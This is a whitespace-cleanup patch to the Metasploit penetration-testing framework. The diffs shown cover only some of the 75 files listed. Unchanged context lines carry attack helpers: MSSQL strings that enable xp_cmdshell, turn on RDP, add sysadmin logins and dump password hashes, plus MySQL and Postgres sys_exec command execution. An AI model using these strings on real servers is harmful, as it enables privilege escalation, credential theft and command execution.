From bf105f48cb51a12fae589bbc71c227ccaed4e496 Mon Sep 17 00:00:00 2001 
From: James Lee
Date: Sun, 20 Nov 2011 12:32:06 +1100
Subject: [PATCH] massive removal of spaces at EOL and some bad tabs
---
 lib/msf/base.rb | 2 +-
 lib/msf/core.rb | 2 +-
 lib/msf/core.rb.ts.rb | 4 +-
 lib/msf/core/encoding/xor.rb | 4 +-
 lib/msf/core/exploit/brutetargets.rb | 8 +-
 lib/msf/core/exploit/capture.rb | 34 ++--
 lib/msf/core/exploit/cmdstager_tftp.rb | 2 +-
 lib/msf/core/exploit/dcerpc_epm.rb | 10 +-
 lib/msf/core/exploit/fileformat.rb | 2 +-
 lib/msf/core/exploit/ipv6.rb | 10 +-
 lib/msf/core/exploit/lorcon.rb | 33 ++--
 lib/msf/core/exploit/mssql_commands.rb | 38 ++---
 lib/msf/core/exploit/mysql.rb | 8 +-
 lib/msf/core/exploit/pdf.rb | 6 +-
 lib/msf/core/exploit/postgres.rb | 2 +-
 lib/msf/core/exploit/riff.rb | 2 +-
 lib/msf/core/exploit/smb.rb | 10 +-
 lib/msf/core/exploit/smtp_deliver.rb | 6 +-
 lib/msf/core/exploit/snmp.rb | 18 +--
 lib/msf/core/exploit/tcp.rb | 6 +-
 lib/msf/core/exploit/tns.rb | 8 +-
 lib/msf/core/handler/bind_tcp.rb | 24 +--
 lib/msf/core/handler/find_shell.rb | 4 +-
 lib/msf/core/handler/find_tag.rb | 8 +-
 lib/msf/core/handler/find_tty.rb | 2 +-
 lib/msf/core/handler/none.rb | 4 +-
 lib/msf/core/handler/reverse_http.rb | 18 +--
 lib/msf/core/handler/reverse_https.rb | 6 +-
 lib/msf/core/handler/reverse_tcp.rb | 30 ++--
 lib/msf/core/handler/reverse_tcp_allports.rb | 4 +-
 lib/msf/core/model/cred.rb | 2 +-
 lib/msf/core/model/host.rb | 10 +-
 lib/msf/core/model/macro.rb | 2 +-
 lib/msf/core/model/service.rb | 4 +-
 lib/msf/core/model/web_site.rb | 14 +-
 lib/msf/core/module/auxiliary_action.rb | 2 +-
 lib/msf/core/module/platform.rb | 26 +--
 lib/msf/core/module/reference.rb | 2 +-
 lib/msf/core/module/target.rb | 12 +-
 lib/msf/core/module/target.rb.ut.rb | 4 +-
 lib/msf/core/payload/aix.rb | 14 +-
 lib/msf/core/payload/java.rb | 2 +-
 lib/msf/core/payload/linux.rb | 6 +-
 lib/msf/core/payload/netware.rb | 16 +-
 lib/msf/core/payload/single.rb | 4 +-
 lib/msf/core/post/file.rb | 8 +-
 lib/msf/core/rpc/auth.rb | 10 +-
 lib/msf/core/rpc/base.rb | 6 +-
 lib/msf/core/rpc/db.rb | 152 +++++++++---------
 lib/msf/core/rpc/job.rb | 6 +-
 lib/msf/core/rpc/module.rb | 2 +-
 lib/msf/core/rpc/plugin.rb | 4 +-
 lib/msf/core/rpc/service.rb | 20 +--
 lib/msf/core/rpc/session.rb | 10 +-
 lib/msf/core/rpc/v10/constants.rb | 6 +-
 lib/msf/core/rpc/v10/rpc_auth.rb | 4 +-
 lib/msf/core/rpc/v10/rpc_base.rb | 6 +-
 lib/msf/core/rpc/v10/rpc_console.rb | 8 +-
 lib/msf/core/rpc/v10/rpc_core.rb | 32 ++--
 lib/msf/core/rpc/v10/rpc_db.rb | 102 ++++++------
 lib/msf/core/rpc/v10/rpc_job.rb | 10 +-
 lib/msf/core/rpc/v10/rpc_module.rb | 8 +-
 lib/msf/core/rpc/v10/rpc_plugin.rb | 6 +-
 lib/msf/core/rpc/v10/rpc_session.rb | 12 +-
 lib/msf/core/session/basic.rb | 2 +-
 lib/msf/core/session/interactive.rb | 2 +-
 lib/msf/core/session/netware_console.rb | 40 ++---
 .../session/provider/multi_command_shell.rb | 2 +-
 lib/msf/core/task_manager.rb | 6 +-
 lib/msf/ui/console/command_dispatcher.rb | 4 +-
 lib/msf/ui/console/command_dispatcher/db.rb | 2 +-
 lib/msf/ui/console/command_dispatcher/nop.rb | 2 +-
 .../ui/console/command_dispatcher/payload.rb | 4 +-
 lib/msf/ui/console/driver.rb | 52 +++---
 lib/msf/util/exe.rb | 12 +-
 75 files changed, 487 insertions(+), 488 deletions(-)
diff --git a/lib/msf/base.rb b/lib/msf/base.rb
index bf264377c8..5257eeed38 100644
--- a/lib/msf/base.rb
+++ b/lib/msf/base.rb
@@ -6,7 +6,7 @@
 # The base library provides implementations for some of the default
 # sessions, such as Shell, Meterpreter, DispatchNinja, and VNC. These
 # sessions are used by modules that come pre-packaged with the default
-# module distribution of Metasploit and are depended on by their
+# module distribution of Metasploit and are depended on by their
 # respective payloads.
 #
 # Beyond providing the default sessions, framework-base also provides
diff --git a/lib/msf/core.rb b/lib/msf/core.rb
index e49369863a..f0bbb13528 100644
--- a/lib/msf/core.rb
+++ b/lib/msf/core.rb
@@ -38,7 +38,7 @@ require 'msf/core/plugin_manager' require 'msf/core/session' require 'msf/core/session_manager' - + # Wrappers require 'msf/core/encoded_payload' diff --git a/lib/msf/core.rb.ts.rb b/lib/msf/core.rb.ts.rb index 410570a4b5..b1e7c0344e 100644 --- a/lib/msf/core.rb.ts.rb +++ b/lib/msf/core.rb.ts.rb @@ -30,7 +30,7 @@ class Msf::TestSuite suite << Msf::Module::PlatformList::UnitTest.suite suite << Msf::Module::Reference::UnitTest.suite suite << Msf::Module::Target::UnitTest.suite - + suite << Msf::Handler::BindTcp::UnitTest.suite suite << Msf::Handler::ReverseTcp::UnitTest.suite @@ -40,4 +40,4 @@ class Msf::TestSuite return suite; end -end \ No newline at end of file +end diff --git a/lib/msf/core/encoding/xor.rb b/lib/msf/core/encoding/xor.rb index 4e1ebf5f30..bbb64cb9eb 100644 --- a/lib/msf/core/encoding/xor.rb +++ b/lib/msf/core/encoding/xor.rb @@ -21,10 +21,10 @@ class Xor cblock ^= key oblock += [ cblock ].pack(block_pack) end - + return oblock end end -end end \ No newline at end of file +end end diff --git a/lib/msf/core/exploit/brutetargets.rb b/lib/msf/core/exploit/brutetargets.rb index 38e06147d7..ef1c0a4b9a 100644 --- a/lib/msf/core/exploit/brutetargets.rb +++ b/lib/msf/core/exploit/brutetargets.rb @@ -16,16 +16,16 @@ module Exploit::BruteTargets def exploit(*args) # Brute force through every available target if (not datastore['TARGET'] or datastore['TARGET'].to_i == 0) - + print_status("Brute forcing with #{(targets.length - 1)} possible targets") - + targets.each_index do |i| next if i == 0 break if session_created? print_status("Trying target #{targets[i].name}...") exploit_target(targets[i]) end - + # Otherwise, only try the specified target else exploit_target(target()) @@ -36,4 +36,4 @@ end end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/capture.rb b/lib/msf/core/exploit/capture.rb index 0089fae6d3..1932fa2aff 100644 --- a/lib/msf/core/exploit/capture.rb +++ b/lib/msf/core/exploit/capture.rb 
@@ -83,7 +83,7 @@ module Exploit::Capture else dev = opts['INTERFACE'] || datastore['INTERFACE'] || nil end - + len = (opts['SNAPLEN'] || datastore['SNAPLEN'] || 65535).to_i tim = (opts['TIMEOUT'] || datastore['TIMEOUT'] || 0).to_i fil = opts['FILTER'] || datastore['FILTER'] @@ -350,7 +350,7 @@ module Exploit::Capture p = PacketFu::ARPPacket.new p.arp_opcode = 1 p.arp_daddr_ip = target_ip || datastore['RHOST'] - p.arp_saddr_ip = source_ip || datastore['LHOST'] + p.arp_saddr_ip = source_ip || datastore['LHOST'] my_eth = self.arp_cache[Rex::Socket.source_address(target_ip)] p.arp_saddr_mac = my_eth || "00:00:00:00:00:00" return p @@ -405,10 +405,10 @@ module Exploit::Capture # which want it should check explicitly for it. TODO: Bug upstream # to release it for real in 0.9.3 def netifaces_implemented? - @pcaprub_loaded and + @pcaprub_loaded and Pcap.respond_to?(:lookupaddrs) and Pcap.respond_to?(:interfaces) and - Pcap.respond_to?(:addresses) + Pcap.respond_to?(:addresses) end def list_interfaces @@ -427,14 +427,14 @@ module Exploit::Capture else return false end - else + else return false end else return Pcap.interfaces.include?(dev) end end - + # This function is usefull only on windows where pcaprub use the GUID def get_interface_guid(dev) check_pcaprub_loaded @@ -445,7 +445,7 @@ module Exploit::Capture else return dev end - else + else return dev end else #Non windows @@ -457,7 +457,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} does not exist" if !addrs + raise RuntimeError, "Interface #{dev} does not exist" if !addrs raise RuntimeError, "Can not get mac address for interface #{dev}" if !addrs[Pcap::AF_LINK][0]['addr'] addrs[Pcap::AF_LINK][0]['addr'] end 
@@ -466,7 +466,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} does not exist" if !addrs + raise RuntimeError, "Interface #{dev} does not exist" if !addrs addrs[Pcap::AF_INET].length end @@ -474,7 +474,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get the IPv4 address for interface #{dev}" if !addrs[Pcap::AF_INET][num]['addr'] addrs[Pcap::AF_INET][num]['addr'] @@ -484,7 +484,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get IPv4 netmask for interface #{dev}" if !addrs[Pcap::AF_INET][num]['netmask'] addrs[Pcap::AF_INET][num]['netmask'] @@ -494,7 +494,7 @@ module Exploit::Capture check_pcaprub_loaded dev = get_interface_guid(dev) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv4 address at position #{num}" if addrs[Pcap::AF_INET].length < num + 1 raise RuntimeError, "Can not get IPv4 broadcast address for interface #{dev}" if !addrs[Pcap::AF_INET][num]['broadcast'] addrs[Pcap::AF_INET][num]['broadcast'] 
@@ -505,7 +505,7 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs addrs[Pcap::AF_INET6].length end @@ -515,7 +515,7 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv6 address at position #{num}" if addrs[Pcap::AF_INET6].length < num + 1 raise RuntimeError, "Can not get ipv6 address for interface #{dev}" if !addrs[Pcap::AF_INET6][num]['addr'] addrs[Pcap::AF_INET6][num]['addr'].gsub(/%(.)*$/,'') @@ -526,13 +526,13 @@ module Exploit::Capture dev = get_interface_guid(dev) raise RuntimeError, "IPv6 information is not available on this platform" if not ::Pcap.const_defined?(:AF_INET6) addrs = Pcap.addresses(dev) - raise RuntimeError, "Interface #{dev} do not exists" if !addrs + raise RuntimeError, "Interface #{dev} do not exists" if !addrs raise RuntimeError, "Interface #{dev} do not have an ipv6 address at position #{num}" if addrs[Pcap::AF_INET6].length < num + 1 raise RuntimeError, "Can not get ipv6 netmask address for interface #{dev}" if !addrs[Pcap::AF_INET6][num]['netmask'] addrs[Pcap::AF_INET6][num]['netmask'] end - - # Protocol-specific encoding/decoding methods until more + + # Protocol-specific encoding/decoding methods until more # application protos get into PacketFu proper # Intended to be used as the payload to an ICMP echo request's payload 
diff --git a/lib/msf/core/exploit/cmdstager_tftp.rb b/lib/msf/core/exploit/cmdstager_tftp.rb index 083f80b92e..032767f6a0 100644 --- a/lib/msf/core/exploit/cmdstager_tftp.rb +++ b/lib/msf/core/exploit/cmdstager_tftp.rb @@ -58,7 +58,7 @@ module Exploit::CmdStagerTFTP def execute_cmdstager_end(opts) stop_service end - + def payload_exe return nil if not @stager_instance @stager_instance.payload_exe diff --git a/lib/msf/core/exploit/dcerpc_epm.rb b/lib/msf/core/exploit/dcerpc_epm.rb index 71e795a6ec..e505ae75d8 100644 --- a/lib/msf/core/exploit/dcerpc_epm.rb +++ b/lib/msf/core/exploit/dcerpc_epm.rb @@ -98,13 +98,13 @@ module Exploit::Remote::DCERPC_EPM else # Break the loop early if we get another NULL handle break if hnd == [0, 0, 0, 0, 1].pack("V*") - - # Use the existing handle if we already have one + + # Use the existing handle if we already have one data = [0, 0, 0, 0, 0].pack("V*") + hnd end ret = dce.call(2, data) - + if ( dce.last_response == nil or dce.last_response.stub_data == nil or @@ -136,7 +136,7 @@ module Exploit::Remote::DCERPC_EPM # Determine number of records rcnt = buf[soff, 2].unpack('v')[0] soff += 2 - + # Parse the data from the stack 1.upto(rcnt) do |i| rlen = buf[soff, 2].unpack('v')[0] @@ -206,7 +206,7 @@ module Exploit::Remote::DCERPC_EPM info[:host].gsub!("\x00", '') if info[:host] res << info - + # Handle a buggy response from a Likewise server that can result in a loop otherwise break if hnd == [0, 0, 0, 0, 0, 0, 0, 0, 0, 1].pack("V*") end diff --git a/lib/msf/core/exploit/fileformat.rb b/lib/msf/core/exploit/fileformat.rb index 70866fda4f..fa03829eff 100644 --- a/lib/msf/core/exploit/fileformat.rb +++ b/lib/msf/core/exploit/fileformat.rb @@ -28,7 +28,7 @@ module Exploit::FILEFORMAT def file_create(data) fname = datastore['FILENAME'] ltype = "exploit.fileformat.#{self.shortname}" - full_path = store_local(ltype, nil, data, fname) + full_path = store_local(ltype, nil, data, fname) print_good "#{fname} stored at #{full_path}" end 
diff --git a/lib/msf/core/exploit/ipv6.rb b/lib/msf/core/exploit/ipv6.rb index 5b2dac9bf5..e8c0a16a16 100644 --- a/lib/msf/core/exploit/ipv6.rb +++ b/lib/msf/core/exploit/ipv6.rb @@ -41,7 +41,7 @@ module Exploit::Remote::Ipv6 def ipv6_interface(opts={}) opts['INTERFACE'] || datastore['INTERFACE'] || ::Pcap.lookupdev end - + # # Shortcut method for determining our link-local address # @@ -55,7 +55,7 @@ module Exploit::Remote::Ipv6 def ipv6_mac(opts={}) Rex::Socket.ipv6_mac(ipv6_interface(opts)) end - + # # Opens a pcaprub capture interface to inject packets, and sniff ICMPv6 packets # @@ -219,7 +219,7 @@ module Exploit::Remote::Ipv6 # Helper methods that haven't made it upstream yet. Mostly packet data # packers, also a checksum calculator. # - + def ipv6_icmpv6_echo_request(id,seq,data) type = 0x80 code = 0 @@ -239,7 +239,7 @@ module Exploit::Remote::Ipv6 this_opt << data[pos+2, (pos-2 + (len * 8))] opts << this_opt pos += this_opt.pack("CCa*").size - end + end opts end @@ -251,7 +251,7 @@ module Exploit::Remote::Ipv6 ["fe80", "", mac[0,2].join, mac[2,2].join("ff:fe"), mac[4,2].join].join(":") end - # From Jon Hart's Racket::L3::Misc#soll_mcast_addr6(), + # From Jon Hart's Racket::L3::Misc#soll_mcast_addr6(), # which is from DDniele Belluci def ipv6_soll_mcast_addr6(addr) h = addr.split(':')[-2, 2] diff --git a/lib/msf/core/exploit/lorcon.rb b/lib/msf/core/exploit/lorcon.rb index 61524c14b4..a01b98e574 100644 --- a/lib/msf/core/exploit/lorcon.rb +++ b/lib/msf/core/exploit/lorcon.rb 
@@ -12,23 +12,22 @@ module Exploit::Lorcon # # Initializes an instance of an exploit module that accesses a 802.11 network # - def initialize(info = {}) super default_intf = 'ath0' default_driver = 'madwifing' - + if (Rex::Compat.is_windows()) # Default to the the first airpcap device on Windows default_intf = "\\\\.\\airpcap00" - + # Default to the airpcap driver on Windows default_driver = 'airpcap' end - + register_options( [ OptString.new('INTERFACE', [true, 'The name of the wireless interface', default_intf]), @@ -39,36 +38,36 @@ module Exploit::Lorcon ], Msf::Exploit::Lorcon ) - + begin - + if(Rex::Compat.is_windows()) airpcap = Rex::FileUtils.find_full_path("airpcap.dll") if (not airpcap) raise RuntimeError, "The airpcap.dll library must be installed" end end - + require 'Lorcon' @lorcon_loaded = true - + rescue ::Exception => e @lorcon_loaded = false @lorcon_error = e end - + end # # Opens a handle to the specified wireless device # def open_wifi - + if (not @lorcon_loaded) print_status("The Lorcon module is not available: #{@lorcon_error}") raise RuntimeError, "Lorcon not available" end - + # XXX: Force the interface to be up system("ifconfig", datastore['INTERFACE'], "up") @@ -80,7 +79,7 @@ module Exploit::Lorcon # Configure the card for reliable injection self.wifi.fmode = "INJECT" self.wifi.channel = (datastore['CHANNEL'] || 11).to_i - + # Configure modulation begin @@ -88,7 +87,7 @@ module Exploit::Lorcon rescue ::ArgumentError => e print_status("Warning: #{e}") end - + # Configure the transmission rate begin self.wifi.txrate = datastore['TXRATE'].to_i if datastore['TXRATE'] @@ -109,19 +108,19 @@ module Exploit::Lorcon def eton(addr) addr.split(':').map { |c| c.hex.chr }.join end - + def channel self.wifi.channel end - + def next_channel cur = self.wifi.channel nxt = (cur > 10) ? 1 : cur + 1 self.wifi.channel = nxt end - + attr_accessor :wifi end -end \ No newline at end of file +end 
diff --git a/lib/msf/core/exploit/mssql_commands.rb b/lib/msf/core/exploit/mssql_commands.rb index 39093938a6..5168376558 100644 --- a/lib/msf/core/exploit/mssql_commands.rb +++ b/lib/msf/core/exploit/mssql_commands.rb 
@@ -9,72 +9,72 @@ module Msf module Exploit::Remote::MSSQL_COMMANDS # Re-enable the xp_cmdshell stored procedure in 2005 and 2008 - def mssql_xpcmdshell_enable(opts={}); + def mssql_xpcmdshell_enable(opts={}) "exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;" end # Re-enable the xp_cmdshell stored procedure on 2000 - def mssql_xpcmdshell_enable_2000(opts={}); + def mssql_xpcmdshell_enable_2000(opts={}) "exec sp_addextendedproc 'xp_cmdshell','xp_log70.dll';exec sp_addextendedproc 'xp_cmdshell', 'C:\\Program Files\\Microsoft SQL Server\\MSSQL\\Binn\\xplog70.dll';" end # Disable the xp_cmdshell stored procedure on 2005 and 2008 - def mssql_xpcmdshell_disable(opts={}); + def mssql_xpcmdshell_disable(opts={}) "exec sp_configure 'xp_cmdshell', 0 ;RECONFIGURE;exec sp_configure 'show advanced options', 0 ;RECONFIGURE;" end # Disable the xp_cmdshell stored procedure in 2000 - def mssql_sql_xpcmdshell_disable_2000(opts={}); + def mssql_sql_xpcmdshell_disable_2000(opts={}) "exec sp_dropextendedproc 'xp_cmdshell';" end # Rebuild xp_cmdshell if it was deleted - def mssql_rebuild_xpcmdshell(opts={}); + def mssql_rebuild_xpcmdshell(opts={}) "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, @RunResult int;DECLARE @ShellID int;EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait;IF @OLEResult <> 0 SELECT @result = @OLEResult;IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OADestroy @ShellID;return @result;" end - + # Turn on RDP - def mssql_rdp_enable(opts={}); + def mssql_rdp_enable(opts={}) "exec master..xp_cmdshell 'REG ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /f /d 
0';" end # Grab servername - def mssql_enumerate_servername(opts={}); + def mssql_enumerate_servername(opts={}) "SELECT @@SERVERNAME" end # Get SQL Server Version Info - def mssql_sql_info(opts={}); + def mssql_sql_info(opts={}) "SELECT @@VERSION" end # Add random user and random password to "sa" role on MSSQL - def mssql_sa_escalation(opts={}); + def mssql_sa_escalation(opts={}) var_username = opts[:username] || rand_text_alpha(5) var_password = opts[:password] || rand_text_alpha(10) "exec sp_addlogin '#{var_username}', '#{var_password}';exec sp_addsrvrolemember '#{var_username}', 'sysadmin'" end # Add SQL current user to sysadmin group - def mssql_current_user_escalation(opts={}); + def mssql_current_user_escalation(opts={}) "declare @moo varchar(50); set @moo = (select SYSTEM_USER); exec master..sp_addsrvrolemember @moo, 'sysadmin'" end - - def mssql_2k5_password_hashes(opts={}); + + def mssql_2k5_password_hashes(opts={}) "SELECT name, password_hash FROM master.sys.sql_logins" end - - def mssql_2k_password_hashes(opts={}); + + def mssql_2k_password_hashes(opts={}) "SELECT name, password FROM master..sysxlogins" end - - def mssql_is_sysadmin(opts={}); + + def mssql_is_sysadmin(opts={}) "SELECT is_srvrolemember('sysadmin')" end - + def mssql_db_names(opts={}) "SELECT name FROM master..sysdatabases" end - + end end diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index c729ffb7fc..c3617754df 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -75,7 +75,7 @@ module Exploit::Remote::MYSQL base_res = nil plugin_res = mysql_get_variable("@@plugin_dir") rescue nil begin - res = mysql_query("show variables like 'basedir'") + res = mysql_query("show variables like 'basedir'") base_res = res.first[1] if res.respond_to? :first rescue nil 
@@ -160,10 +160,10 @@ module Exploit::Remote::MYSQL target_path = mysql_get_plugin_dir if target_path print_status "Target arch (#{arch}) and target path both okay." - soname = mysql_upload_sys_udf(arch,target_path) + soname = mysql_upload_sys_udf(arch,target_path) mysql_drop_and_create_sys_exec(soname) return true - else + else print_status "Cannot determine an appropriate target path." false end @@ -185,7 +185,7 @@ module Exploit::Remote::MYSQL def mysql_sys_exec(cmd,doprint=false,opts={}) res = mysql_query("select sys_exec('#{cmd}')") if res && doprint - print_status "Executing: #{cmd}" + print_status "Executing: #{cmd}" return res end end diff --git a/lib/msf/core/exploit/pdf.rb b/lib/msf/core/exploit/pdf.rb index 246a03686c..112cff562b 100644 --- a/lib/msf/core/exploit/pdf.rb +++ b/lib/msf/core/exploit/pdf.rb @@ -27,11 +27,11 @@ module Exploit::PDF @xref = [] @pdf = '' end - + ## #Original Filters ## - + def ASCIIHexWhitespaceEncode(str) return str if not datastore['PDF::Obfuscate'] result = "" @@ -102,7 +102,7 @@ module Exploit::PDF input = stream.dup while i < input.size do - + if input.length - i < 4 addend = 4 - (input.length - i) input << "\0" * addend diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 843e2c1e93..621976f2fe 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -280,7 +280,7 @@ module Exploit::Remote::Postgres def postgres_sys_exec(cmd) q = "select pg_temp.sys_exec('#{cmd}')" resp = postgres_query(q) - if resp[:sql_error] + if resp[:sql_error] print_error resp[:sql_error] return false end diff --git a/lib/msf/core/exploit/riff.rb b/lib/msf/core/exploit/riff.rb index 725fb1fed3..997cd7a445 100644 --- a/lib/msf/core/exploit/riff.rb +++ b/lib/msf/core/exploit/riff.rb @@ -22,7 +22,7 @@ module Exploit::RIFF return tag + [len].pack('V') + data + ("\x00" * padding) end - + # # Builds a RIFF list chunk (one containing other chunks) # 
diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index e8ac242aa1..03f13e46b9 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -75,7 +75,7 @@ module Exploit::Remote::SMB # Control the identified operating system of the client # OptString.new('SMB::Native_OS', [ true, 'The Native OS to send during authentication', 'Windows 2000 2195']), - OptString.new('SMB::Native_LM', [ true, 'The Native LM to send during authentication', 'Windows 2000 5.0']), + OptString.new('SMB::Native_LM', [ true, 'The Native LM to send during authentication', 'Windows 2000 5.0']), ], Msf::Exploit::Remote::SMB) @@ -168,7 +168,7 @@ module Exploit::Remote::SMB end #the default chunk size of 48000 for OpenFile is not compatible when signing is enabled (and with some nt4 implementations) - #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED + #cause it looks like MS windows refuse to sign big packet and send STATUS_ACCESS_DENIED #fd.chunk_size = 500 is better def smb_open(path, perm) self.simple.open(path, perm, datastore['SMB::ChunkSize']) @@ -760,7 +760,7 @@ module Exploit::Remote::SMBServer end def smb_set_defaults(c, pkt) - smb = @state[c] + smb = @state[c] pkt['Payload']['SMB'].v['ProcessID'] = smb[:process_id].to_i pkt['Payload']['SMB'].v['UserID'] = smb[:user_id].to_i pkt['Payload']['SMB'].v['TreeID'] = smb[:tree_id].to_i @@ -776,12 +776,12 @@ module Exploit::Remote::SMBServer pkt['Payload']['SMB'].v['Command'] = cmd pkt['Payload']['SMB'].v['Flags1'] = 0x88 if esn - pkt['Payload']['SMB'].v['Flags2'] = 0xc801 + pkt['Payload']['SMB'].v['Flags2'] = 0xc801 else pkt['Payload']['SMB'].v['Flags2'] = 0xc001 end pkt['Payload']['SMB'].v['ErrorClass'] = errorclass - c.put(pkt.to_s) + c.put(pkt.to_s) end diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index 077af3078c..97e41d8a69 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb 
@@ -11,7 +11,7 @@ require 'rex/mime' ### module Exploit::Remote::SMTPDeliver - + include Exploit::Remote::Tcp # @@ -100,7 +100,7 @@ module Exploit::Remote::SMTPDeliver raw_send_recv("#{auth}\r\n",nsock) else print_status("Server requested auth and no creds given, trying to continue anyway") - end + end elsif res =~ /AUTH/ print_error("Server doesn't accept any supported authentication, trying to continue anyway") else @@ -184,7 +184,7 @@ module Exploit::Remote::SMTPDeliver # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 attr_reader :banner - + protected attr_writer :banner #:nodoc: diff --git a/lib/msf/core/exploit/snmp.rb b/lib/msf/core/exploit/snmp.rb index b6e1c3e883..2cbfe6b386 100644 --- a/lib/msf/core/exploit/snmp.rb +++ b/lib/msf/core/exploit/snmp.rb @@ -9,11 +9,11 @@ module Msf # ### module Exploit::Remote::SNMPClient - - + + include Exploit::Remote::Udp - + # # Creates an instance of a SNMP exploit module. # @@ -29,9 +29,9 @@ module Exploit::Remote::SNMPClient OptString.new('VERSION', [ true, 'SNMP Version <1/2c>', '1' ]), OptInt.new('TIMEOUT', [ true, 'SNMP Timeout', 1 ]), OptInt.new('RETRIES', [ true, 'SNMP Retries', 1 ]) - ], Msf::Exploit::Remote::SNMPClient) + ], Msf::Exploit::Remote::SNMPClient) end - + # # This method wraps the snmp library and passes in # the Rex UDP socket @@ -52,20 +52,20 @@ module Exploit::Remote::SNMPClient :Transport => SNMP::RexUDPTransport, :Socket => s ) - + @snmp = snmp if global snmp end - + def disconnect_snmp @snmp.close if @snmp @snmp = nil end - + def snmp @snmp end - + def community datastore['COMMUNITY'] || 'public' end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 0cd7661dd4..6dfab710cb 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb 
@@ -289,7 +289,7 @@ module Exploit::Remote::TcpServer OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), - + ], Msf::Exploit::Remote::TcpServer) register_advanced_options( @@ -368,7 +368,7 @@ module Exploit::Remote::TcpServer else comm = nil end - + self.service = Rex::Socket::TcpServer.create( 'LocalHost' => srvhost, 'LocalPort' => srvport, @@ -423,7 +423,7 @@ module Exploit::Remote::TcpServer self.service.deref if self.service.kind_of?(Rex::Service) if self.service.kind_of?(Rex::Socket) self.service.close - self.service.stop + self.service.stop end self.service = nil rescue ::Exception diff --git a/lib/msf/core/exploit/tns.rb b/lib/msf/core/exploit/tns.rb index 12a38b043f..863f47664e 100644 --- a/lib/msf/core/exploit/tns.rb +++ b/lib/msf/core/exploit/tns.rb @@ -8,9 +8,9 @@ module Msf # ### module Exploit::Remote::TNS - + include Exploit::Remote::Tcp - + # # Creates an instance of a TNS exploit module. # @@ -28,7 +28,7 @@ module Exploit::Remote::TNS def tns_packet(connect_data) packet_length = [58 + connect_data.length].pack('n') - + # Packet length pkt = packet_length # Checksum @@ -98,6 +98,6 @@ module Exploit::Remote::TNS return pkt end - + end end diff --git a/lib/msf/core/handler/bind_tcp.rb b/lib/msf/core/handler/bind_tcp.rb index e03c419c36..8051b24764 100644 --- a/lib/msf/core/handler/bind_tcp.rb +++ b/lib/msf/core/handler/bind_tcp.rb @@ -62,12 +62,12 @@ module BindTcp # Starts a new connecting thread # def add_handler(opts={}) - + # Merge the updated datastore values opts.each_pair do |k,v| datastore[k] = v end - + # Start a new handler start_handler end 
